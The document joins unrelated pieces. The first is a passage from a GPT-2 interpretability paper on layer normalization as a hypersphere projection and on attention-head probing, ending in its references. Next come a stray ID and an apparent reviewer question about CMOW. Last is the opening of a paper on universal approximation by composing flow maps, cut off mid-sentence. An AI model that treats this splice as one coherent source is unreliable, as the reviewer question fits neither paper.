hyper-ellipsoid, while the bias term \(\beta\) translates the ellipsoid’s center away from the origin (Figure 3). ![Figure 2: Layer normalization visualized on 3D data. Left: Original feature space (from randomly sampled data), with each data point color-coded according to its position in space. Right: Feature space after layer normalization, note that all data points lie within the plane perpendicular to the \(\mathbf{1}\) vector.](image) In modern implementations of the transformer, layer normalization is applied before both the attention and feed-forward module updates within each block, and once more before the final prediction step Xiong et al. (2020). We note that such an arrangement ensures that data within each transformer layer is constrained to the surface of a potentially distinct hyper-sphere. Yet, due to the residual nature of transformers, all intermediate layer representations inhabit the same vector space. As a result, features from different layers project onto a shared hyper-sphere, which we denote as \(H_S\). Interestingly, layer normalization’s placement prior to the classification softmax has another consequence. It drives the model to optimize dot-product similarity between certain points within \(H_S\) and word vectors in the embedding matrix \(W_E \in \mathbb{R}^{V \times d}\), where \(|V|\) is the vocabulary size. This optimization indirectly defines the meaning of points in \(H_S\) as a function of their similarity with words represented in \(W_E\). ### 2.2 Multi-Head Self-Attention To understand how the geometric intuition behind \(H_S\) allows for the interpretability of latent representations within a transformer, we analyze the parameter matrices in the multi-head self-attention module Vaswani et al. (2017). For a given input sequence \(X \in \mathbb{R}^{s \times d}\) of length \(s\), the multi-head self-attention mechanism is defined as follows: \[ \text{MultiHead}(X) = \sum_{i}^{h} \text{softmax}\left(\frac{XW_{QK}^i X^T}{\sqrt{d}}\right)XW_{VO}^i \] (5) Where \( h \) is the number of self-attention heads while \( W_{QK}^i \in \mathbb{R}^{d \times d} \) and \( W_{VO}^i \in \mathbb{R}^{d \times d} \) are low-rank virtual matrices obtained by grouping the query, key, value and output projection matrices at each head (Elhage et al., 2021; Dar et al., 2022). A full derivation of Equation 5 from the original formulation by Vaswani et al. (2017) is provided in Appendix B. ### 2.2.1 The Query-Key Matrix For any given head \( i \), the query-key matrix \( W_{QK}^i \) is commonly interpreted as a bi-linear form \( g_i : \mathbb{R}^d \times \mathbb{R}^d \rightarrow \mathbb{R} \) that represents the relevance between keys and queries. However, it is also possible to consider \( W_{QK}^i \) as a linear transformation that maps inputs to a query representation \( X_Q^i = XW_{QK}^i \), similar to that considered in Brody et al. (2023)\(^1\). With the head’s attention score matrix \( A^i \in [0, 1]^{s \times s} \), for a given sequence length \( s \), obtained as: \[ A^i = \text{softmax}\left(\frac{X_Q^i X^T}{\sqrt{d}}\right) \] (6) This process is illustrated for normalized inputs in the right-most section of Figure 3. Essentially, the role of the \( W_{QK} \) matrix and the layer normalization parameters is to find an affine transformation over \( H_S \) such that, when superimposed on itself, brings related terms closer together and keeps unrelated terms apart. It is important to mention that for \( k < d \), the matrix \( W_{QK}^i \) cannot be inverted, as it won’t have a full rank. This implies, by the rank-nullity theorem, that for each head, there must be a set of \( d - k \) query vectors \( Q_{null}^i \subset \mathbb{R}^d \) that map to the zero vector and, as a consequence, attend to all keys equally. Conversely, there must also exist a set of \( d - k \) keys \( K_{null}^i \subset \mathbb{R}^d \) that are attended to by all queries equally, with a pre-softmax attention score of zero. ![Figure 3](image-url) **Figure 3**: Visualization of the self-attention process for a single head. **Left**: Layer normalization projects the input features on the surface of the hyper-sphere \( H_S \). **Center Left**: A scaling parameter \( \gamma \) is commonly applied after normalization; it transforms the hyper-sphere into a hyper-ellipsoid. **Center Right**: A bias term \( \beta \) is also applied after normalization; it displaces the hyper-ellipsoid away from the origin. **Right**: The input features are mapped to a query representation (in red) by the matrix \( W_{QK} \) and superimposed over their previous representation to obtain the self-attention scores. ### 2.2.2 The Value-Output Matrix and the Residual Stream To understand the role of the \( W_{VO} \) matrix within the transformer, we now consider the update step after multi-head attention at a given layer \( l \): \[ X_{l+1} = X_l + \text{MultiHead}(\text{LayerNorm}(X)) \] (7) \(^1\)An alternative key representation \( X_K^i = XW_{QK}^i \) can also be considered Note that by plugging in Equation 5 and Equation 6, the layer update can be re-written as: \[ X_{l+1} = X_l + \sum_i^h A^i X^i_V \] (8) where \[ X^i_V = \text{LayerNorm}(X_l) W^i_{VO} \] (9) It can be seen that the multi-head attention mechanism consists of the sum of \( h \) individual updates, each one given by one of the attention heads. Within each head, all words in the sequence propose an update \( X^i_V \), and these are aggregated according to their attention scores \( A^i \). In Equation 9, the matrix \( W^i_{VO} \) transforms the normalized inputs in \( H_S \) into a set of updates in the same latent space as the residual stream. Furthermore, we propose that the \( W^i_{VO} \) matrix is better understood as a second key-value store (Sukhbaatar et al., 2015; Geva et al., 2021) within the attention layer. To see why, consider its Singular Value Decomposition (SVD) (Millidge & Black, 2022): \( W^i_{VO} = U \Sigma V^T \). By substituting in Equation 9, we obtain: \[ X^i_V = (Q_{VO} K^i_{OV})^T V^i_{OV} \] (10) where \[ Q_{VO} = \text{LayerNorm}(X) \] \[ K^i_{OV} = (U \Sigma)^T \] \[ V^i_{OV} = V^T \] (11) The left singular vectors, associated with the columns of \( U \Sigma \in \mathbb{R}^{d \times d} \), act as a library of “keys” \( K^i_{OV} \) against which the normalized features \( X_l \in H_S \) are compared. While the corresponding right singular vectors, associated with rows in \( V^T \in \mathbb{R}^{d \times d} \), act as the output values \( V^i_{OV} \) that define the direction in which to update the information in the residual stream for a given key. This interpretation is motivated by the results of Millidge & Black (2022), where it is shown that the right singular vectors \( V^T \) of the \( W_{VO} \) matrix tend to have interpretable meanings when decoded using \( W_E \), with some of the transformer heads consistently representing a single topic in most of their singular vectors. We would also like to mention that, similar to the \( W_{QK} \) matrix, the \( W_{OV} \) matrix has at least \( d - k \) singular values equal to zero. This means that multiple queries \( Q_{VO} \) will map to the zero vector and thus won’t update the information in the residual stream, allowing the model to skip the update process if necessary. To conclude, we highlight that the proposed interpretation of attention behaves very similarly to that of the feed-forward module given by Geva et al. (2021), as both calculate relevance scores and aggregate sub-updates for the residual stream. However, the way the scores and updates are calculated is very different. The attention module relies primarily on dynamic context for its scores and values, while the feed-forward module relies on static representations. ### 2.3 The Word Embedding Matrix and Output Probabilities Once all the attention and feed-forward updates have been applied, the output probabilities of the network can be obtained as follows (Xiong et al., 2020): \[ P_Y = \text{softmax}(\text{LayerNorm}(X_L) W^T_E) \] (12) Equation 12 can be interpreted as measuring the similarity between the final layer representation \( X_L \) when projected to \( H_S \), and each of the embedding vectors in \( W_E \). Given that all vectors in the projection have the same norm \( \sqrt{d} \), the only relevant factor in deciding the output probability distribution \( P_{Y[t,:]} \in [0, 1]^{|V|} \), at a given timestep \( t \), is the location of its corresponding vector \( X_{L[t,:]} \) within \( H_S \). This behavior is very similar to that described by the von Mises-Fisher distribution (Fisher, 1953), as both represent distributions parameterized by a reference vector within a hypersphere. Nonetheless, in the case of transformers, the support of the distribution is defined over a discrete set of points in \( \mathbb{R}^d \) instead of the entire surface of \( H_S \), as it is for the von Mises-Fisher. Table 1: Distance between the normalized embeddings LayerNorm($W_E$) and different transformations of the embedding matrix $W_E$. | Setting | Mean $\ell_2$ Distance | Mean Cosine Distance | |--------------------------|------------------------|----------------------| | Original | 23.747 (0.432) | <0.001 (<0.001) | | Centered | 24.872 (0.432) | 0.150 (0.035) | | Scaled by $\sqrt{d}$ | 2.413 (1.862) | <0.001 (<0.001) | | Centered + Scaled by $\sqrt{d}$ | 14.591 (1.469) | 0.150 (0.035) | In the case where layer normalization includes scaling and bias parameters $\gamma$ and $\beta$, the output probabilities are calculated as follows: $$P_Y = \text{softmax}(\hat{X}_L \Gamma W_E^T + \beta W_E^T)$$ where $\hat{X}_L$ is the projection of $X_L$ to $H_S$ and $\Gamma$ is a diagonal matrix such that $\Gamma_{ii} = \gamma_i$. The effect of $\Gamma$ on the representation is that of transforming $H_S$ into an ellipsoid (see the center-left section of Figure 3) while $\beta W_E^T$ acts as a bias that assigns higher probability to certain tokens independent of the input. In both cases (with and without bias and scale parameters), the proposed interpretation aligns with that of iterative refinement within transformers (Jastrzebski et al., 2017; nostalggebraist, 2020; Elhage et al., 2021; Geva et al., 2022; Belrose et al., 2023), given that intermediate representations $X_l$ can always be converted into output probabilities using Equation 12. 3 EXPERIMENTS This section presents our experimental results. All experiments were done on a RTX 4090 GPU using pre-trained weights from the 124M parameter version of GPT-2 (Radford et al., 2019; Karpathy, 2023). 3.1 IMPACT OF LAYER NORMALIZATION ON THE WORD EMBEDDINGS To measure the impact of layer normalization on the position of the embedding vectors $w_e \in W_E$, we calculated both the $\ell_2$ and cosine distances between the layer-normalized weights and the following settings: - Original: The original word embeddings without any modification - Centered: Original + centering around the mean $E[w_e]$ - Scaled: Original divided by the average vector norm $E[||w_e||]$ and multiplied by $\sqrt{d}$ - Centered + Scaled: Original + centering + scaling The results in Table 1 show that the mean cosine distance between the original word embeddings and the embeddings after normalization is close to zero, meaning that projection onto $H_S$ does not modify the orientation of the embedding vectors. The results also confirm this when centering is applied, as the cosine distance increases significantly when the original vectors are displaced from the origin and towards the mean. On the other hand, it can be seen that the $\ell_2$ distance is high for all settings except for when scaling is applied without centering. Given an average norm of $E[||w_e||] = 3.959$ and for $\sqrt{d} = 27.713$ we can conclude that the original word embeddings lie between the origin and $H_S$ rather than on its surface, with different embeddings having different norms. We hypothesize that variance in the norm of embedding vectors ($\text{SD}(||w_e||) = 0.434$) is likely to be a result of the use of the word embedding matrix as a classification layer (see Equation 13). To verify whether this is the case, we select the top and bottom 5 embedding vectors based on the three following criteria: --- 2 Code to replicate all experiments will be made available upon acceptance Table 2: Top 5 and Bottom 5 tokens from the word embedding matrix. | Position | Norm | Scaled Norm | Norm + Bias | Scaled Norm + Bias | |----------|---------------|-------------|-------------|--------------------| | Top 1 | SPONSORED | \xa9\xb6\xe6 | . | the | | Top 2 | \x96\x9a | tremend | the | , | | Top 3 | soDeliveryDate| \x96\x9a | . | and | | Top 4 | eneger | senal | and | a | | Top 5 | Reviewer | millenn | - | in | | Bottom 5 | for | - | \xc0 | \x07 | | Bottom 4 | an | ( | \x07 | \x0f | | Bottom 3 | on | "\n" | \x10 | oreAndOnline | | Bottom 2 | in | - | \x11 | \x06 | | Bottom 1 | at | - | \xfe | \xc1 | - **Norm**: The norm of the original embedding vector \( w_E \) - **Scaled Norm**: The norm of the embedding vector when scaled by the Layer Norm parameter \( \Gamma \) - **Norm + Bias**: The norm of the original embedding vector plus the bias scores obtained from \( \beta W_E^T \) - **Scaled Norm + Bias**: The sum between the Scaled Norm and the bias scores. The sorted tokens in Table 2 show that considering only the norm of the embeddings is not enough, as tokens that are not commonly used (like ‘SPONSORED’ and ‘soDeliveryDate’) have the highest norms, while common words like ‘for’, ‘an’, ‘on’ and ‘in’ have the lowest norm. After considering the scaling parameter \( \Gamma \), we observe that punctuation signs like the newline character or the comma ‘,’ have the lowest norm, and that there is no clear pattern on the top tokens. After considering bias, we see that the distribution of top tokens clearly shifts, with punctuation symbols and common words now at the top and uncommon bytes at the bottom. Finally, note that when both scale and bias are considered, the top tokens are consistent with some of the most common words in the English language: ‘the’, ‘and’, ‘a’ and ‘in’ with the only exception being the comma character, which is also very common in natural language, while the bottom tokens are related to uncommon bytes and an anomalous token. ### 3.2 Probing Attention Heads with Normalized Representations of Common Nouns Next, we probe the attention heads at layers 0, 5 and 11 of the GPT-2 model using as inputs the 100 most common nouns taken from the Corpus of Contemporary American English (COCA) (Davies 2010). First, we transform the embedding matrix \( W_E \) according to the normalization parameters specific to each layer (see Figure 3) and then multiply the normalized embeddings \( \hat{W}_E \) by either \( W_{QK} \) or \( W_{VO} \). To decode the output from \( W_{QK} \), we retrieve the top-k closest embedding vectors from \( \hat{W}_E \) based on dot product similarity. For \( W_{VO} \), we add the head-specific and layer-specific output biases (see Equation S.8) to obtain the “update vectors”. These update vectors are then added to the original embeddings from \( W_E \) and transformed according to the normalization parameters from the last layer; then, we retrieve the top-k closest embeddings from the original \( W_E \) embedding matrix based on dot product similarity. #### 3.2.1 Query-Key Transformations In Table D.1, we present partial results for the query-key transformations at layer 0, given the query inputs ‘time’, ‘life’ and ‘world’. We note that some of the heads preserve the meaning of the query, as is the case for heads 1, 5 and 10, possibly looking for repetition, while others look for keys that precede it. Such precedence heads might help to disambiguate the meaning of the words, with examples like: ‘Showtime’ vs. ‘spacetime’, ‘battery life’ vs. ‘wildlife’ and ‘underworld’ vs. ‘Westworld’. Other heads appear to be looking for contextual associations, as is the case for head 2, which seems to relate ‘world’ with dates and concepts from the First and Second World wars. When looking at deeper layers (as shown in Table D.2 & D.3), we were not able to identify any meaningful patterns on the query transformations, suggesting that these layers might look for more complex patterns that cannot be measured by probing. 3.2.2 Key-Value Transformations In Table D.4, we present partial results for the key-value transformations using the same three sample inputs. For most heads at layer 0, the meaning of the input key is kept as is. However, when the sum of all the heads is considered, we see a slight shift in the meaning of the words. For heads at layer 5 (shown in Table D.5), we see that although most of the heads preserve the meaning of the input keys ‘life’ and ‘world’ (and around half of the heads for the input ‘time’), the sum of all heads does change the word meaning dramatically, and without a clear output pattern. As our experiment is limited to testing a single input key at a time, it might be possible that updates in this layer rely more heavily on the contextual composition between multiple keys, which we did not capture. Finally, in the last layer (Table D.6), we see that most individual heads map to seemingly arbitrary values, with only a few preserving the meaning of the input key. However, when the sum of the heads is considered, the layer preserves the meaning of the input keys. To test the hypothesis that meaning-preserving heads dominated the layer update, we measured the norm of the output values for each head (before adding the layer-specific bias $\beta_O$). We found that, in most cases, these heads do not have higher norms. Instead, heads promoting common tokens like ‘the’, ‘.’, and ‘and’ had the highest norms. These results suggest that some heads at the last layer work together to preserve the meaning of the input keys and mitigate the network’s bias towards common tokens. 3.3 Probing the Singular Vectors of the Virtual Attention Matrices 3.3.1 Singular Vectors of the Key-Value Matrix To verify whether the key-value interpretation of $W_{VO}$ matrix proposed in Subsubsection 2.2.2 is correct, we probe each of its singular vectors (as proposed in Millidge & Black (2022)). For the left singular vectors $U$ (scaled by $\Sigma$), we use the normalized embeddings $W_E$ as a probe, while for the right singular vectors $V^T$, we use the original embeddings $W_E$. Given that all singular values are constrained to be positive, we get two possible singular vector pairs corresponding to each singular value: $(u,v)$ and $(-u,-v)$. For ease of analysis, we choose the signed pair with its $v$ component closest to any of the embeddings $w_e \in W_E$, using the dot product similarity. We did not observe any interpretable pattern for the attention heads at layer 0 and found only one interpretable head at layer 5 (head 10), which referred to terms in politics and chemistry. However, we found that most heads in layer 11 were interpretable (except for heads 5, 7 and 9) and present the results for all heads in Appendix E. An illustrative case of these patterns is head 3, where most of its singular vector mappings are related to jobs or industries. For example, ‘Dairy’ maps to ‘USDA’ (the United States Department of Agriculture), ‘engine’ to ‘drivers’, ‘trading’ to ‘Sales’ and so on. Similar patterns were present in other heads, listed as follows: - **Head 0**: Formatting and punctuation symbols (end of text, new line, brackets and parenthesis) - **Head 1**: Gender words - **Head 2**: Proper Nouns (Places) - **Head 3**: Jobs / Industries - **Head 4**: Letters and Numbers - **Head 6**: Suffixes and Prefixes related to the ending and beginning of words - **Head 8**: Punctuation symbols - **Head 10**: Proper Nouns (First and Last names) - **Head 11**: The identity function (input similar to the output) We found that these patterns were consistent with those obtained in the key → value results from Table D.6, implying that the subject-specific behavior of the singular vectors is reflected in the input-output transformations of the attention heads. These results complement previous work from Millidge & Black (2022), in which only the right singular vectors $V^T$ were considered. 3.3.2 Singular Vectors of the Query-Key Matrix In additional experiments on the SVD of the $W_{QK}$ matrix, we found that some singular vector pairs had clear associations. For example, in head 0 of layer 0, we found some associations related to programming languages (‘self, class, =, import’ → ‘Python’) and digital cameras (‘Video, 264, minutes’ → ‘Nikon, lineup, shot, camera’) but we could not identify any specialization for the heads. in this layer. Surprisingly, we did find that heads at the last layer had identifiable patterns on their left singular vectors (associated with the queries) consistent with those listed for the $W_{V,O}$ matrix (punctuation for head 0, gender for head 1, and so on), but no clear patterns were identified for the right singular vectors. ### 3.4 Visualizing Iterative Refinement Finally, we visualize how the information in the residual stream is updated (i.e. the iterative refinement process) leveraging dimensionality reduction techniques, as shown in Figure 4. For this, we chose the test sentence ‘To kill two birds with one stone’, as the predictability of its last token, ‘stone’, given the previous context was high (correctly predicted by the model) and none of the words in the sentence repeated. To project the high dimensional embeddings into 3D space, we used UMAP (McInnes et al., 2018), with Laplacian Eigenmap initialization (Belkin & Niyogi, 2001; Kobak & Linderman, 2021), and we fit the transform using the first 10,000 embedding vectors from $W_E$ to accurately reflect proximity in the original embedding space. We show the original embedding tokens as reference (in blue) and plot the trajectory of the second-to-last token, ‘one’, as we process the entire sequence (with added positional embeddings) throughout the network. For each layer, we transform the latent representations in the residual stream using the normalization parameters from the final output layer before projecting with UMAP. It can be seen that the representation of the second-to-last token shifts from its original meaning (‘one’) towards the meaning of the next token (‘stone’). Although the figure also shows the magnitude and direction of each update in the trajectory, it is important to mention that these quantities might have been modified due to the dimensionality reduction process. ### 4 Conclusion We have presented a new interpretation of transformer models based on the geometric intuition behind each of its components. First, we showed how layer normalization can be better understood as a projection of latent features in $\mathbb{R}^d$ to a $(d - 1)$-dimensional hyper-sphere and provide experimental evidence that the word embeddings learned by GPT-2 are distributed toward different directions of the hyper-sphere, we also demonstrate that the parameters of the final normalization layer are crucial in obtaining high-scoring tokens consistent with high-frequency tokens in the English language. Second, we discussed the role of the $W_{Q,K}$ and $W_{V,O}$ matrices as transformations related to the hyper-sphere, with $W_{Q,K}$ as an affine transformation that overlaps queries and keys, and $W_{V,O}$ as a key-value map between the hyper-sphere and the original embedding space. These intuitions were experimentally tested with probing experiments, showing promising results in understanding the role of query-key attention in earlier layers and extending the results from Millidge & Black (2022) on the subject-specific nature of the $W_{V,O}$ matrix in attention heads at deeper layers. Finally, we integrated these ideas and the impact of each component on the residual stream to provide visual evidence of how the iterative refinement process works within transformers, illustrating the journey that occurs from a previous token to the next. REFERENCES Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E Hinton. Layer normalization. *arXiv preprint arXiv:1607.06450*, 2016. Yuntao Bai, Saurav Kadavath, Sandipan Kundu, Amanda Askell, Jackson Kernion, Andy Jones, Anna Chen, Anna Goldie, Azalia Mirhoseini, Cameron McKinnon, et al. Constitutional ai: Harmlessness from ai feedback. *arXiv preprint arXiv:2212.08073*, 2022. Mikhail Belkin and Partha Niyogi. Laplacian eigenmaps and spectral techniques for embedding and clustering. *Advances in neural information processing systems*, 14, 2001. Nora Belrose, Zach Furman, Logan Smith, Danny Halawi, Igor Ostrovsky, Lev McKinney, Stella Biderman, and Jacob Steinhardt. Eliciting latent predictions from transformers with the tuned lens. *arXiv preprint arXiv:2303.08112*, 2023. Shaked Brody, Uri Alon, and Eran Yahav. On the expressivity role of layernorm in transformers’ attention. *arXiv preprint arXiv:2305.02582*, 2023. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in neural information processing systems*, 33:1877–1901, 2020. Xiangning Chen, Chen Liang, Da Huang, Esteban Real, Kaiyuan Wang, Yao Liu, Hieu Pham, Xuanyi Dong, Thang Luong, Cho-Jui Hsieh, et al. Symbolic discovery of optimization algorithms. *arXiv preprint arXiv:2302.06675*, 2023. Guy Dar, Mor Geva, Ankit Gupta, and Jonathan Berant. Analyzing transformers in embedding space. *arXiv preprint arXiv:2209.02535*, 2022. Mark Davies. The corpus of contemporary american english as the first reliable monitor corpus of english. *Literary and linguistic computing*, 25(4):447–464, 2010. Danny Driess, Fei Xia, Mehdi SM Sajjadi, Corey Lynch, Aakanksha Chowdhery, Brian Ichter, Ayzaan Wahid, Jonathan Tompson, Quan Vuong, Tianhe Yu, et al. Palm-e: An embodied multi-modal language model. *arXiv preprint arXiv:2303.03378*, 2023. Nelson Elhage, Neel Nanda, Catherine Olsson, Tom Henighan, Nicholas Joseph, Ben Mann, Amanda Askell, Yuntao Bai, Anna Chen, Tom Conerly, et al. A mathematical framework for transformer circuits. *Transformer Circuits Thread*, 1, 2021. Ronald Aylmer Fisher. Dispersion on a sphere. *Proceedings of the Royal Society of London. Series A. Mathematical and Physical Sciences*, 217(1130):295–305, 1953. Mor Geva, Roei Schuster, Jonathan Berant, and Omer Levy. Transformer feed-forward layers are key-value memories. In *Proceedings of the 2021 Conference on Empirical Methods in Natural Language Processing*, pp. 5484–5495, 2021. Mor Geva, Avi Caciuclaru, Kevin Wang, and Yoav Goldberg. Transformer feed-forward layers build predictions by promoting concepts in the vocabulary space. In *Proceedings of the 2022 Conference on Empirical Methods in Natural Language Processing*, pp. 30–45, 2022. Google. Palm 2 technical report. Google AI, 2023. URL [https://ai.google/static/documents/palm2techreport.pdf](https://ai.google/static/documents/palm2techreport.pdf). Stanislaw Jastrzebski, Devansh Arpit, Nicolas Ballas, Vikas Verma, Tong Che, and Yoshua Bengio. Residual connections encourage iterative inference. *arXiv preprint arXiv:1710.04773*, 2017. Andrej Karpathy. Github - karpathy/nanopt: The simplest, fastest repository for training/finetuning medium-sized gpts., 2023. URL [https://github.com/karpathy/nanoGPT](https://github.com/karpathy/nanoGPT). Dmitry Kobak and George C Linderman. Initialization is critical for preserving global data structure in both t-sne and umap. *Nature biotechnology*, 39(2):156–157, 2021.
UVb0g26xyH
CMOW is a simple sentence embedding method that represents every word as a matrix and composes words in a sentence via matrix multiplication. Hence, CMOW builds a linear deep neural network dynamically. Could you comment on in how far this relates to your idea in the conclusion to construct novel NLP models by embedding every word as a function?
VOCABULARY FOR UNIVERSAL APPROXIMATION: A LINGUISTIC PERSPECTIVE OF MAPPING COMPOSITIONS Anonymous authors Paper under double-blind review ABSTRACT In recent years, deep learning-based sequence modelings, such as language models, have received much attention and success, which pushes researchers to explore the possibility of transforming non-sequential problems into a sequential form. Following this thought, deep neural networks can be represented as composite functions of a sequence of mappings, linear or nonlinear, where each composition can be viewed as a word. However, the weights of linear mappings are undetermined and hence require an infinite number of words. In this article, we investigate the finite case and constructively prove the existence of a finite vocabulary $V = \{\phi_i : \mathbb{R}^d \to \mathbb{R}^d | i = 1, ..., n\}$ with $n = O(d^2)$ for the universal approximation. That is, for any continuous mapping $f : \mathbb{R}^d \to \mathbb{R}^d$, compact domain $\Omega$ and $\varepsilon > 0$, there is a sequence of mappings $\phi_{i_1}, ..., \phi_{i_m} \in V, m \in \mathbb{Z}_+$, such that the composition $\phi_{i_m} \circ ... \circ \phi_{i_1}$ approximates $f$ on $\Omega$ with an error less than $\varepsilon$. Our results demonstrate an unusual approximation power of mapping compositions which is a little similar to the compositionality in linguistics which is the idea that a finite vocabulary of basic elements can be combined via grammar to express an infinite range of meanings. 1 INTRODUCTION Cognitive psychologists and linguists have long recognized the importance of languages (Pinker, 2003), which has been further highlighted by the popularity of language models such as BERT (Devlin et al., 2018) and GPT (Brown et al., 2020). These models, based on RNNs or Transformers, have revolutionized natural language processing by transforming it into a sequence learning problem. They can handle the long-term dependencies in text and generate coherent text based on the previous content, making them invaluable tools in language understanding and generation (Vaswani et al., 2017). The success of these models has also led to a new approach to solving non-sequential problems by transforming them into sequential ones. For instance, image processing can be turned into a sequence learning problem by segmenting an image into small blocks, arranging them in a certain order, and then processing the resulting sequence using sequence learning algorithms to achieve image recognition (Dosovitskiy et al., 2021). The use of sequence learning algorithms has also been extended to reinforcement learning (Chen et al., 2021), such as the decision transformer outputs the optimal actions by leveraging a causally masked transformer and exceeds the state-of-the-art performance. Sequence modeling has opened up new possibilities for solving a wide range of problems, and this trend seems to hold in the field of theoretical research. As is well known, artificial neural networks have universal approximation capabilities, and wide or deep feedforward networks can approximate continuous functions on a compact domain arbitrarily well (Cybenko, 1989; Hornik et al., 1989; Leshno et al., 1993). However, in practical applications such as AlphaFold (Jumper et al., 2021), BERT (Devlin et al., 2018) and GPT (Brown et al., 2020), the residual network structures (He et al., 2016a,b) are more preferred than the feedforward structures. It is observed that residual networks (ResNets) are forward Euler discretizations of dynamical systems (E, 2017; Sander et al., 2022), and this relationship has spawned a series of dynamical system-based neural network structures such as the neural ODE (Chen et al., 2018). The dynamical system-based neural network structures are expected to play an important role in various fields. Notably, both the language models and the dynamical systems are linked to time series modeling and have been effectively applied to non-sequential problems. This observation naturally leads us to question: *is there an intricate relationship between their individual successes?* This article aims to ponder upon the question. Through a comparative study, we obtain some initial results from the perspective of universal approximation. Specifically, we demonstrate that there exists a finite set of mappings, referred to as the vocabulary $V$, choosing as flow maps of some autonomous dynamical system $x'(t) = f(x(t))$, such that any continuous mapping can be approximated by compositing a sequence of mappings in the vocabulary $V$. This bears a resemblance to the way complex information is conveyed in natural language through constructing phrases, sentences, and ultimately paragraphs and compositions. Table 1 provides an intuitive representation of this similarity. | English | Flow map of dynamical systems † | |---------|--------------------------------| | Vocabulary | $\sim 140,000$† | $O(d^2)$ | | Word | I, you, am, is, are, apple, banana, car, buy, do, have, blue, red,... | $\phi_{\pm e_1}^\tau, \phi_{\pm e_2}^\tau, ..., \phi_{\pm e_d}^\tau, \phi_{\pm E_{11}x}^\tau, \phi_{\pm E_{12}x}^\tau, \phi_{\pm E_{21}x}^\tau, ..., \phi_{\pm E_{d2}x}^\tau, \phi_{\pm \text{ReLU}(x)}^\tau$... | | Phrase | A big deal, easier said than done, time waits for no man,... | $\phi_{e_1}^\tau \cdot \phi_{-e_2}^\tau, \phi_{e_1}^\tau \cdot \phi_{E_{11}x}^\tau \cdot \phi_{\text{ReLU}(x)}^\tau$... | | Sentence | It was the best of times, it was the worst of times, it was the age of wisdom, it was the age of foolishness,... | $\phi_{e_3}^\tau \cdot \phi_{\text{ReLU}(x)}^\tau \cdot \phi_{-E_{21}x}^\tau \cdot \phi_{\text{ReLU}(x)}^\tau \cdot \phi_{E_{23}x}^\tau \cdot \phi_{-e_2}^\tau \cdot \phi_{\text{ReLU}(x)}^\tau \cdot \phi_{E_{11}x}^\tau \cdot \phi_{e_1}^\tau$... | † The number of words, phrases, and meanings in Cambridge Advanced Learner’s Dictionary. ‡ Notations are provided in Section 2. ### 1.1 Contributions 1. We proved that it is possible to achieve the universal approximation property by compositing a sequence of mappings in a finite set $V$. (Theorem 2.2 and Corollary 2.3). 2. Our proof is constructive as we designed such a $V$ that contains a finite number of flow maps of dynamical systems. (Theorem 2.6) ### 1.2 Related works **Universal approximation.** The approximation properties of neural networks have been extensively studied, with previous studies focusing on the approximation properties of network structures such as feedforward neural networks (Cybenko [1989], Hornik et al. [1989], Leshno et al. [1993]) and residual networks (He et al. [2016a,b]). In these networks, the structure is fixed and the weights are adjusted to approximate target functions. Although this paper also considers universal approximation properties, we use a completely different way. We use a finite set of mappings, and the universal approximation is achieved by composing sequences of these mappings. The length of the mapping sequence is variable, which is similar to networks with a fixed width and variable depth (Lu et al. [2017], Johnson [2019], Kidger & Lyons [2020], Park et al. [2021], Beise & Da Cruz [2020], Cai [2022]). However, in our study, we do not consider learnable weights; instead, we consider the composition sequence, which is different from previous research. **Residual network, neural ODE, and control theory.** The word mapping constructed in this paper is partially based on the numerical discretization of dynamical systems and therefore has a relationship with residual networks and neural ODEs. Residual networks (He et al. [2016a,b]) are currently one of the most popular network structures and can be viewed as a forward Euler discretization of neural ODEs (Chen et al. [2018]). Recently, Li et al. (2022) and Tabuada & Gharesifard (2020, 2022) studied the approximation properties of neural ODEs. Their basic idea is employing controllability results in control theory to construct source terms that approximate a given finite number of input-output pairs, thus obtaining the approximation properties of functions in the $L^p$ norm or continuous norm sense. Additionally, Duan et al. (2022) proposed an operator splitting format that... discretizes neural ODEs into Leaky-ReLU fully connected networks. Partially inspired by Duan et al.'s construction, we designed a special splitting method to finish Part 1 of our construction. It's worth noting that all neural networks mentioned above can be represented as compositions of mapping sequences. However, the networks involve an infinite number of mappings, which is different from our construction which only requires a finite number of mappings. **Compositionality.** Our results demonstrate that the composition is a powerful operator that allows us to achieve the universal approximation property on compact domains by using a finite number of mappings. This is a little similar to the concept of compositionality in linguistics, especially in the Montagovian framing [Montague (1970); Kracht (2012)], which is the idea that a finite vocabulary of basic elements can be combined via a grammar to express an infinite range of meanings. Recently, researchers have explored the capabilities of neural models to acquire compositionality while learning from data [Dankers et al. (2022); Valvoda et al. (2022)]. However, they focused on algebraic relations rather than approximations. It's interesting to think whether these studies and ours can be connected. **Word embedding.** The finite mapping vocabulary might be related to the word embedding in natural language processing. The most basic model involves embedding words as vectors and then summing these word vectors to obtain the sentence vector [Mikolov et al. (2013)]. However, the summation operator is commutative, and thus vector embedding models fail to capture any notion of word order. To address this limitation, Rudolph & Giesbrecht (2010) proposed modeling words as matrices rather than vectors and composing sentence embeddings through matrix multiplication instead of addition. For recent advancements in this direction, we refer to Mai et al. (2018); Asaad et al. (2023). It is noteworthy that, to the best of our knowledge, prior research in this domain has not delved into the approximation properties. Leveraging the techniques presented in this paper, we can readily establish the existence of a finite vocabulary for both vector embedding and matrix embedding (refer to Appendix D). Furthermore, it is important to note that vector space and matrix space are finite-dimensional, while the continuous function space is infinite-dimensional. This suggests that embedding words as nonlinear mappings could enhance the expressiveness of sentences. However, there is limited exploration in this direction. ### 1.3 Outline We state the main result for universal approximation in Section 2, which includes notations, main theorems, and ideas for construction and proof. Before providing the detailed construction in Section 4, we add a Section 3 to introduce flow maps and the techniques we used. Finally, in Section 5 we discuss the result of this paper. All formal proof of the theorems is provided in the Appendix. ## 2 Notations and Main Results ### 2.1 Preliminaries The statement and the proof of our main results contain some concepts in mathematics. Here we provide a brief introduction for them, which is enough to understand most parts of this paper. One concept is the orientation-preserving (OP) diffeomorphisms of $\mathbb{R}^d$. A differentiable map $f : \mathbb{R}^d \to \mathbb{R}^d$ is called a diffeomorphism if it is a bijection and its inverse $f^{-1}$ is differentiable as well. In addition, a diffeomorphism $f$ of $\mathbb{R}^d$ is called orientation-preserving if the Jacobian of $f$ is positive everywhere. A simple example of OP diffeomorphisms is the linear map $f : x \to Px$ where $x \in \mathbb{R}^d$ and $P$ is a square matrix with positive determinant. Another concept is the flow map of dynamical systems. Here the dynamical system is characterized by the following ordinary differential equation (ODE) in dimension 